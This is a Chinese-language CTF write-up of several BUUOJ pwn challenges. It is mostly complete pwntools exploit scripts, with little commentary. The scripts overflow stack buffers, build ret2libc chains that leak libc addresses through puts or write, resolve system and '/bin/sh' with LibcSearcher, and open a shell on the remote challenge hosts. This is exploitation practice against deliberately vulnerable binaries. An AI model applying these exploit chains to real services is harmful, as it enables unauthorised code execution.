下班了继续做
level0
先checksec一下
很简单的道理就是vulner函数里面存在漏洞call到callsystem就好了
就覆盖0x80个就好了
算了之后这种简单题就直接给payload吧
ciscn_2019_n_1
这道题看了源码是逆向加pwn
逆向完就很简单了
就直接ret2libc
因为是64所以需要找一下gadget
直接贴代码吧
#coding=utf8
from pwn import *
from LibcSearcher import *
context.log_level = 'debug'
context.terminal = ['gnome-terminal','-x','bash','-c']
context.terminal = ['tmux','splitw','-h']
context.arch = 'amd64'
local = 0
if local:
cn = process('./ciscn_2019_c_1')
bin1 = ELF('./ciscn_2019_c_1',checksec=False)
else:
cn = remote('node3.buuoj.cn', 29644)
bin1 = ELF('./ciscn_2019_c_1')
def z(a=''):
if local:
gdb.attach(cn,a)
if a == '':
raw_input()
# z('b*0x0400AD6\nc')
pop_rdi = 0x00400c83 # pop rdi ; ret
main_addr = 0x0400B28
cn.sendline('1')
cn.recvuntil('encrypted\n')
payload = flat(
'A'*0x50, 0 , pop_rdi, bin1.got['puts'],bin1.plt['puts'],main_addr
)
cn.sendline(payload)
cn.recvuntil('O\n')
puts_addr = u64(cn.recvuntil('\n')[:-1].ljust(8,'\x00'))
log.success(hex(puts_addr))
cn.recvuntil('choice!\n')
libc=LibcSearcher("puts",puts_addr)
libc_base=puts_addr-libc.dump("puts")
system_addr=libc_base+libc.dump("system")
str_bin_sh=libc_base+libc.dump("str_bin_sh")
cn.sendline('1')
cn.recvuntil('encrypted\n')
payload = flat(
'A'*0x50, 0 ,0x0400B27, pop_rdi, str_bin_sh,system_addr
)
cn.sendline(payload)
cn.interactive()
babyrop
from pwn import *
from LibcSearcher import *
#context.log_level = 'debug'
#p=process("./babyrop")
p=remote('node3.buuoj.cn', 26990)
elf=ELF("./babyrop")
#gdb.attach(p)
payload="\x00\x00\x00\x00"+"a"*(0x2c-0x25-0x4)+"\xff"
p.sendline(payload)
p.recvuntil("Correct\n")
write_plt=elf.plt['write']
write_got=elf.got['write']
main_addr=0x08048825
payload="a"*0xE7+p32(0xdeadbeef)+p32(write_plt)+p32(main_addr)+p32(1)+p32(write_got)+p32(4)
p.sendline(payload)
write_addr=u32(p.recv(4))
print "write_addris "+hex(write_addr)
libc=LibcSearcher("write",write_addr)
libc_base=write_addr-libc.dump("write")
system_addr=libc_base+libc.dump("system")
str_bin_sh=libc_base+libc.dump("str_bin_sh")
print "libc_base is "+hex(libc_base)
print "system_addr is "+hex(system_addr)
print "str_bin_sh is "+hex(str_bin_sh)
payload="\x00\x00\x00\x00"+"a"*(0x2c-0x25-0x4)+"\xff"
p.sendline(payload)
p.recvuntil("Correct\n")
payload="a"*0xE7+p32(0xdeadbeef)+p32(system_addr)+p32(main_addr)+p32(str_bin_sh)
p.sendline(payload)
p.interactive()
ciscn_2019_n_1
关键函数好像栈溢出覆盖成这个就好了
没试过小数
值就存储在这个位置所以只要盖成这个就好了
#coding=utf8
from pwn import *
context.log_level = 'debug'
context.terminal = ['gnome-terminal','-x','bash','-c']
context.terminal = ['tmux','splitw','-h']
context.arch = 'i386'
local = 1
if local:
cn = process('./ciscn_2019_n_1')
# bin = ELF('./task_shoppingCart',checksec=False)
# libc = ELF('/lib/x86_64-linux-gnu/libc.so.6',checksec=False)
# libc = ELF('/lib/i386-linux-gnu/libc.so.6',checksec=False)
else:
cn = remote('node3.buuoj.cn', 27179)
# libc = ELF('/lib/x86_64-linux-gnu/libc.so.6',checksec=False)
pass
def z(a=''):
if local:
gdb.attach(cn,a)
if a == '':
raw_input()
z('b*0x04006A2')
# system_addr = 0x08048F0E
payload = flat('A'*(0x30-0x4),0x41348000)
cn.sendline(payload)
cn.interactive()
ciscn_2019_en_2
一样的payload
#coding=utf8
from pwn import *
from LibcSearcher import *
context.log_level = 'debug'
context.terminal = ['gnome-terminal','-x','bash','-c']
context.terminal = ['tmux','splitw','-h']
context.arch = 'amd64'
local = 0
if local:
cn = process('./ciscn_2019_c_1')
bin1 = ELF('./ciscn_2019_c_1',checksec=False)
else:
cn = remote('node3.buuoj.cn', 26666)
bin1 = ELF('./ciscn_2019_en_2')
def z(a=''):
if local:
gdb.attach(cn,a)
if a == '':
raw_input()
# z('b*0x0400AD6\nc')
pop_rdi = 0x00400c83 # pop rdi ; ret
main_addr = 0x0400B28
cn.sendline('1')
cn.recvuntil('encrypted\n')
payload = flat(
'A'*0x50, 0 , pop_rdi, bin1.got['puts'],bin1.plt['puts'],main_addr
)
cn.sendline(payload)
cn.recvuntil('L \n')
puts_addr = u64(cn.recvuntil('\n')[:-1].ljust(8,'\x00'))
log.success(hex(puts_addr))
cn.recvuntil('choice!\n')
libc=LibcSearcher("puts",puts_addr)
libc_base=puts_addr-libc.dump("puts")
system_addr=libc_base+libc.dump("system")
str_bin_sh=libc_base+libc.dump("str_bin_sh")
cn.sendline('1')
cn.recvuntil('encrypted\n')
payload = flat(
'A'*0x50, 0 ,0x0400B27, pop_rdi, str_bin_sh,system_addr
)
cn.sendline(payload)
cn.interactive()